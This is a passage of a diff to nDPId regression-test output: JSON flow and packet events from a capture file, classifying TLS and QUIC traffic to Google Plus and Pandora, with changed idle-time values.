73a3hMG\/oeLH2XJGbp7tfnJSbIrw7OjnmUjZjC3QFC5ZT\/D9lfLZQtLioZhFU2dvfGzIgp3e6A6JbEE0vFluuvChl2C+0rBUUI4BDQaLDC36yd\/nqeU9YkBNuGMLNwmS1nu9FZU8mcDANqVoY5yVLg2kamNS5X1hNq7e0ZttiC++uqF2vAilhDlKm4Sn9UjPckZuiZBomYpyg0Mx2VTEwtpKds6MA+UAswT6IhWCQVBWewjai+fOWFc9I1PVuJXv6wszew3Hcqcb00f6u5LLpYQLzSeihJuZrVlM1j6lGBHe0EhJ6DL1teURdZuXWHdzyDqDjp983xiqcs411z8ivoxsAQrnJoCWJxd7jZsORlrj+qRu70MzdRwWows6Ir5D2WLnk\/xr5xZXlxc0qq35KzQxuScxBBYPpS5ZzPphWbiD4nd3CHT+adzTjAAAAAQMZlWcIEaJhA\/pmmGJA9VVpI4dKlmrgeF\/YggQi8sjf99E3nv5OtPvRrtZcyuW01yoBM35YdPwOsg50xXr\/BiQRHRmpg5AI\/Gxv40hVq1L2PZoVADVhqqGncF1oScVHTbM9W4m3oXbHay1EHfQ5lAWTWpN49l9Tiv7IrVgj7Dp+73Bh+\/I4be++4+GN0yWQOqn0T+ijD3iAvjW07u4KFggANU2wFU17wsvlJuMqKoty0iSiIcZD1Fpv8YeBupA3Jd5TcFAQxL\/\/amaXv8CyobSjSega7I6w3iSVpXXusfvcoL9IwMGqCbpjl4yujE+\/2nPBKVvs4iEZolT1zqdJU8Q5tR5vWxmVZ56Vkqmz6hVG35AqABKCyEo\/gk\/PneTs58wsy3Z+6AWG31mbKVGDVWKfuUivH9e1GriPy0Y1T2Vi68\/VxrxY\/w=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495836963,"flow_last_seen":1646495836963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495836963,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1646495836963,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836963,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8O4hAAEAG9ELAqAGAjvq5zsWwAbtVp40sAAAAAKAC+vA0nQAAAgQFtAQCCApsJfcbAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1646495836979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836979,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8r34AAHIGjcyO+rnOwKgBgAG7xbDcn6Z3VaeNLaAS\/\/\/zpwAAAgQFlgQCCApyIEa6bCX3GwEDAwg="} -01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1646495836983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495836983,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5O4pAAEAG8kPAqAGAjvq5zsWwAbtVp40t3J+meIAYAfYRowAAAQEICmwl9zByIEa6FgMBAgABAAH8AwOIf7nJ5breQpxi5aty74p4A0tH8s+YhJ7uQwoAchgbeyDiYRrjyIJgoj6ghTCikRuTluEoGumBBaOR1N7eUGiD\/gAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5nb29nbGVwbHVzLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBQQOMOQqFJCXmUicpi9d2kYaSiqPqeBjWpdYiUO92OBgAXAEEEwEm0an4CaV7UYrRD1yMS8F4iZzs0QylP5VOKPX+Fji27U1gjEJPJGZS7PVMPfJS0GsqWWRpHV\/lDyKacoCtA0wArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495836963,"flow_last_seen":1646495836983,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495836983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495837006,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495836963,"flow_last_seen":1646495836963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495836963,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1646495836963,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836963,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8O4hAAEAG9ELAqAGAjvq5zsWwAbtVp40sAAAAAKAC+vA0nQAAAgQFtAQCCApsJfcbAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1646495836979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495836979,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8r34AAHIGjcyO+rnOwKgBgAG7xbDcn6Z3VaeNLaAS\/\/\/zpwAAAgQFlgQCCApyIEa6bCX3GwEDAwg="} +01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1646495836983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495836983,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5O4pAAEAG8kPAqAGAjvq5zsWwAbtVp40t3J+meIAYAfYRowAAAQEICmwl9zByIEa6FgMBAgABAAH8AwOIf7nJ5breQpxi5aty74p4A0tH8s+YhJ7uQwoAchgbeyDiYRrjyIJgoj6ghTCikRuTluEoGumBBaOR1N7eUGiD\/gAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5nb29nbGVwbHVzLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBQQOMOQqFJCXmUicpi9d2kYaSiqPqeBjWpdYiUO92OBgAXAEEEwEm0an4CaV7UYrRD1yMS8F4iZzs0QylP5VOKPX+Fji27U1gjEJPJGZS7PVMPfJS0GsqWWRpHV\/lDyKacoCtA0wArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495836963,"flow_last_seen":1646495836983,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495836983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495837006,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495837086,"flow_last_seen":1646495837086,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495837086,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02265{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1646495837086,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495837086,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAVpAABAAEARLnPAqAGAjvq17o\/gAbsFVdqKwQAAAAEIGskra7CKZYEDuYLxAEIVFxxqmZ08lCd3LEamnRnTwqMewjQTOXHJ+bQBCnc75qyddTeYHQ3SnzAULSCTOvy9BuronZfx+Rok2NEb\/1BsWpwM7HvouqIbg\/UM9rh+Oz94fTVRKCbJSe1Rt9Wi3IS3cTWhF88qqkbPlVNVfTP6qf147kmXwAclEb200UQEzcAZIv3o++EPu3L79R8FmBpBYJnCKkgaxbqODau1mi\/955te0zmkf2846gwZzwMXzDwbr6\/3HnP3h8OfoVM0MIFN9x7Ds+vGpVKDRpQM0NlvNQfFfblQvgPKr6\/wJHgowwd40oBCNI3FTXFgafKbw2f8iXs1MuIi6dbw5qDMfDg7neN7v6\/vcX4HSf8y6PVeyxCvA4+7q957ap\/3PII07iu47YhDzCD0lwTDjfi\/a1raoLz70\/SPK9NEbeWnxibfZXFeg8+E6Qmd9DFP4zQ2QPKahjqlPM4ZePdB1N+sWTrGnHY+e5VOY4qYOyABuFGeuadAN35ZvnTav7s\/+rzxtiAo1AWyqO5W85hkYntoGdWyMOzcrhaGvKoJNlyQWa3gWJkpY39Z1uzVJ9G3lDdAsC9\/zRJfbRKvAouMAfcWbKNWIPlVEx425CNhqzWnjNjSzKi5ec4e5C4us09IcxcJ6YiARP3HINF5Ycp8CM+O3SAPpWjAj1wgjVCtDNLk+H+lVLgNqHb0nSuRRFGscCZoJV0VpfhM0MYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495837086,"flow_last_seen":1646495837086,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495837086,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"plus.google.com","version":"TLSv1.3","alpn":"h3","ja3":"b719940c5ab9a3373cb4475d8143ff88","tls_supported_versions":"TLSv1.3"}} 02275{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1646495837102,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495837102,"pkt":"PKn0qB\/spJGxgjQ5CABFgAVpAABAADMROvOO+rXuwKgBgAG7j+AFVSXtyAAAAAEDuYLxCBrJK2uwimWBAEU4Tznrzq28hb1XmRDs0MFqelTnhcFUZ84H4q1aY4G8iO4oHDfc48pBHn\/VwFJa95gqSHvH4Ev8Om2dP0drKfHTm5RIabnMUwABEpNiK30Wb+s0DC1P8fJqrYirSkcMUtk+OScepXvvMoUJqb3oK\/SHueY\/CR+1r94ahlb+lQ5CMkRrFEpV8Y80c9Tk558ky1YvZroBJocv+D8x22dTrB3Nr2zV5BXUe4IfZjyM1uOvrGOzm7BFlSrMgOj6FKIkCgp\/pf+jrmIN6zoTCYHljLfpxOi3CtJlotE5kvBNJfYTIlpV6ePxOeaBHnLAnR8AUiLMe4EQhoCyafpPSu2uRilBt0zY24SPHj+Vr1q8JDD3+tdbrEpwnhqALSf4fMlI0nlCiW6KDCz9YYUL75K4IS9444yNzf1Yr99Mh0kbqbRkqVD2lz0sc+tejmla91jt2s1ymwqM2Dkc57wq\/ZGL2qTvHoCDCrWXzzSFq2DtMODbeFddKrW7D2S\/WC6gNpi8CkmnUEfrksPztXbMxr+4svM2m36IzD+uTDtBonQOeeetS42fSNmayHtkfbHFRhxhKIWxbXnDeYhaHVYjCQ+4X0zwkTVPladnLIcVEBYqwYQv5\/bz9ieX8wyoykaDLtE9CrJi2EKtZ8wkCC7Z741Zd+Wml1GFTEX8vTPcXOs4jWXGa8by36ak7R21cVgtCbMzCsX51MXYO9rxKpqzQ90YL3ZJybESTLyCZVaetnFQQy0zj9i3aMbEeaF1GIY8fpv41LJIfBTcuddEsku5mHk0ET+hIJRQHhrqv3\/7dLCFIB8IbFzqoMNXvst3vFd153RNd4+wDFw0PTKp3WxAax7aH3o4vpIKkH5MYZZm6QdYg4AXeCOVs+yOQckfo449mppsZnBCauNFwyGHgfdImQc5ChUcBackKfZKPm+8gpfez3Lh5cIH5TVZfBcX2049yxCxwBIQNMHRFZ\/l6px98JrGqv9wlLvZ9x05f9o+OBwqtGjSma1n6CqkHTjCKDb9wEKbD27oXi\/IB1KPHp2u9d\/c+7X2RVtjWmizhI43eqsfAt6YQSI\/I6i5XWGJRa1qw\/6lLbvQvj\/jHqXTS68GWhBdBLJUtfTko6qCsN7rqu1qRzGoIhl0BkGE92lNyYY\/ZTU6\/hdcvPHH\/gVolLu3hFDPu+ipgvDDLIZuRl+UaoOI4gJccnN1m37oKsX6NQtnyeGSc2tM6+62ei3A6X8waSaElCusvteiUGCHQxwaHmAxN+l0Fnrtj2W9v8HqhbG8zavLaMSK9TCSurpq1GtTp5SAztNP1KCrvVnqVhJrjpPBsMoRZgIibHU+b02bSrZ5vLUq8fMRq1DHjSpmxuFXNZXv4gyNl3Dl6lhcF466Vu3DVIKOpmXUnOt94P9drBleL2pc6g\/Rsi+uKui90velUE0hGPgoOIhhDJ0ymy34LYnDdDZuGwprFKEAglwy2+YC1sXbba6gKVjcOV1Ca5zHuLIWZHit470RXXzr7m1Xi\/5cXZYyKSyJACVo6ge6ve+Upi7YI+aW+jgyPqmHMKb+I\/eIOcKZeHyih24R2l7AgjvcvMggC5W8nbNUSu9cpnGWdlPqjTB0D+d7oT5+bGyUabkzh3dJ2t9fzH8gnGtlT1zFzufTmcBCKpbCY6sP\/0lUq7vHjuvu650M0IhuYA8e9G78Y8vHGY8YN9zIOLD+CF2bDXHwqf3VW0Z0KdlLeLkOH0oqFJ9UgLOZLQqYMUReoZ97In3a7hJ65ZurIhpFxCeAoO9kMhJrGIJTN\/Ls9g=="} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":513,"packets-processed":512,"total-skipped-flows":0,"total-l4-data-len":233934,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":42,"total-detection-updates":47,"total-updates":0,"current-active-flows":10,"total-active-flows":46,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":319,"global_ts_msec":1646568788171} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646568788171,"flow_last_seen":1646568788171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646568788171,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1646568788171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788171,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8AQRAAEAGfpzAqAGA0FUontLaAbs4n4KKAAAAAKAC+vB1NgAAAgQFtAQCCArSjLpwAAAAAAEDAwc="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1646568788337,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788337,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Ke1AAPAGpbLQVSiewKgBgAG70tpN2CtOOJ+Ci6ASOQiNqgAAAgQFtAEDAwAEAggKXyXRHtKMunA="} -01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1646568788341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646568788341,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5AQZAAEAGfJ3AqAGA0FUontLaAbs4n4KLTdgrT4AYAfYOtAAAAQEICtKMuxtfJdEeFgMBAgABAAH8AwNyi5pZnYizmESRNRsWFzLDUgF4AIT\/tX3zYbufDRkzzyDMV\/FK528iuv6PxN\/1DD4BU1TMzFBPBIF01ZAvPFWIVwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtwYW5kb3JhLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBUk5TxRwMmI7m3PUpmyv2jiTq1G62x80KdY2tfOvxfVgAXAEEEr8O4oznU2jNZk5ZC+\/pUpJeqcDtGn2NikTZa2J69CfKpIdzohOHLj9fffI5zTez3ppU6JIFTO2\/VBVQmSVbRwwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646568788171,"flow_last_seen":1646568788341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646568788341,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646568788171,"flow_last_seen":1646568788508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788508,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01231{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":518,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646568788171,"flow_last_seen":1646568788673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3789,"flow_avg_l4_payload_len":631,"midstream":0,"thread_ts_msec":1646568788673,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": 